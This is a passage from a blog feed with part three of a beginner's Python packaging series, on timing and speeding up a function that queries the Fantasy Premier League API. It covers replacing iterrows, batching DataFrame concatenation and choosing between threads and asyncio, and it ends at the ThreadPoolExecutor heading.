&lt;/p&gt;</description></item><item><title>Creating a Python Package with Poetry for Beginners Part 3</title><link>https://www.jumpingrivers.com/blog/python-package-part-three/</link><pubDate>Thu, 04 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package-part-three/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-three/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package-part-three/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="intro"&gt;Intro&lt;/h2&gt;
&lt;p&gt;This it the third part of a blog series. In the previous posts we have addressed: creating a package with Poetry, managing our development environment and
adding a function in &lt;a href="https://www.jumpingrivers.com/blog/python-package/" rel="external"&gt;part one&lt;/a&gt;;
and package documentation, testing and how to publish to PyPI in
&lt;a href="https://www.jumpingrivers.com/blog/python-package-part-two" rel="external"&gt;part two&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In those previous posts, I
developed a function for summarising the successes (and failures) of the teams in a fantasy football league. That function makes various API calls which in theory could all be made in parallel to speed up
the runtime.&lt;/p&gt;
&lt;p&gt;In this blog I aim to parallelise the function &lt;code&gt;get_season_league&lt;/code&gt; which I wrote in the
first blog.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-package-part-3"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="starting-function"&gt;Starting Function&lt;/h2&gt;
&lt;p&gt;Here is the function written in part one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;leagues-classic/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/standings/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;standings&amp;#39;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;&amp;#39;results&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame([])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat([df, player_df])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The logic is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Query API to get current league data&lt;/li&gt;
&lt;li&gt;Loop over each member of the league
&lt;ul&gt;
&lt;li&gt;Query API for individual player&lt;/li&gt;
&lt;li&gt;Return relevant data&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The way it is currently written is how any normal for loop will run, where the current
iteration must finish before the next one starts. With this code we shouldn&amp;rsquo;t need to wait for the previous
API call, there is no dependency or anything like that. In theory we could run all of the individual player
queries at once and the function would be a lot faster.&lt;/p&gt;
&lt;h2 id="measuring-function-calls-in-python"&gt;Measuring function calls in Python&lt;/h2&gt;
&lt;p&gt;We can measure how long it takes to run a piece of Python code using the &lt;a href="https://docs.python.org/3/library/time.html" rel="external"&gt;&lt;code&gt;time&lt;/code&gt;&lt;/a&gt; package. For example measuring
my &lt;code&gt;get_season_league&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;get_league&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; get_season_league
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;start_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; time&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;time()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; get_season_league()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(&lt;span style="color:#a5d6ff"&gt;&amp;#34;--- &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;%s&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; seconds ---&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&lt;/span&gt; (time&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;time() &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; start_time))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;My function was taking ~3.5 seconds for the default league. Which has 13 players and there has been
11 game weeks. An average of 0.27 seconds per player (including the single original API call).&lt;/p&gt;
&lt;p&gt;I also tested it for a larger league of 50 people and seems to take ~13 seconds but with more variance. This
is a similar 0.26 seconds per player.&lt;/p&gt;
&lt;p&gt;So this is why I want to parallelise the function, as if the non-dependent API calls could be
made all at once, or at least multiple at once the function could be sped up massively. For example
for the league of 50 taking the time per player at 0.26 seconds if I introduce two processes
at once then it could take ~6.5 seconds, or 4 processes ~3.25. These values are approximate,
but hopefully you can see the value of splitting up the parallelisable parts of the workload.&lt;/p&gt;
&lt;h2 id="optimising-the-function"&gt;Optimising the Function&lt;/h2&gt;
&lt;p&gt;Before starting on the asynchronous side there is a few things we can address first.&lt;/p&gt;
&lt;h3 id="iterrows-alternative"&gt;&lt;code&gt;iterrows()&lt;/code&gt; Alternative&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;iterrows()&lt;/code&gt; function is pretty inefficient for this use case (generally as well).
&lt;a href="https://ryxcommar.com/2020/01/15/for-the-love-of-god-stop-using-iterrows/" rel="external"&gt;This blog&lt;/a&gt; explains
it well and why there are better alternatives like &lt;code&gt;itertuples&lt;/code&gt;. However I am just going to loop
over a zip of the values I need.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Old:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# New:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; player_id, player_name, team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="concatenating-dataframes"&gt;Concatenating DataFrames&lt;/h3&gt;
&lt;p&gt;Another area I could improve the function is switching away from concatenating dataframes from within
the for loop, towards either concatenating once at the end or creating a list of dictionaries then converting
to a DataFrame at the end.&lt;/p&gt;
&lt;p&gt;The reason for this is the way Pandas handles DataFrame memory allocation, more detail on this &lt;a href="https://saturncloud.io/blog/efficiently-appending-to-a-dataframe-within-a-for-loop-in-python/" rel="external"&gt;Saturn
Cloud blog&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Old:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame([])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat([df, player_df])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# New:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; list_to_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; player_id, player_name, team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league[&lt;span style="color:#a5d6ff"&gt;&amp;#34;entry&amp;#34;&lt;/span&gt;], league[&lt;span style="color:#a5d6ff"&gt;&amp;#34;player_name&amp;#34;&lt;/span&gt;], league[&lt;span style="color:#a5d6ff"&gt;&amp;#34;entry_name&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(player_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: player_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: team_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; list_to_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;append(player_df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat(list_to_df, ignore_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These changes do seem to have sped up the function by a few seconds (for the league of 50) but the bulk
time is taken by the API queries so these best practices aren&amp;rsquo;t going to speed it up too much, but are
worth implementing nevertheless.&lt;/p&gt;
&lt;h2 id="asynchronising-the-code"&gt;Asynchronising the Code&lt;/h2&gt;
&lt;p&gt;Before I start on this section I will give a brief background on asynchronous programming but if you want
more detail please read &lt;a href="https://blog.devgenius.io/multi-threading-vs-asynchronous-programming-what-is-the-difference-3ebfe1179a5" rel="external"&gt;this blog&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There is two main routes we can go down here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;concurrent.futures.ThreadPoolExecutor&lt;/code&gt; will use multiple threads, so the code is technically synchronous
it will just be running at the same time in different use cases. This will be easier to implement with the
current code however the time gains wouldn&amp;rsquo;t scale as much as the alternative. This approach will use more
computational power as we&amp;rsquo;ll need additional processors.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;asyncio&lt;/code&gt; will use a single threaded multi-tasking, truly asynchronous code. The syntax is more complex
and doesn&amp;rsquo;t integrate very well with my current function for example I will need to replace &lt;code&gt;requests&lt;/code&gt; with
&lt;code&gt;aiohttp&lt;/code&gt;. This would definitely be the better option if I was making lots of api calls, but on a smaller
scale the gains wouldn&amp;rsquo;t be as significant.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="concurrentfuturesthreadpoolexecutor"&gt;concurrent.futures.ThreadPoolExecutor&lt;/h2&gt;
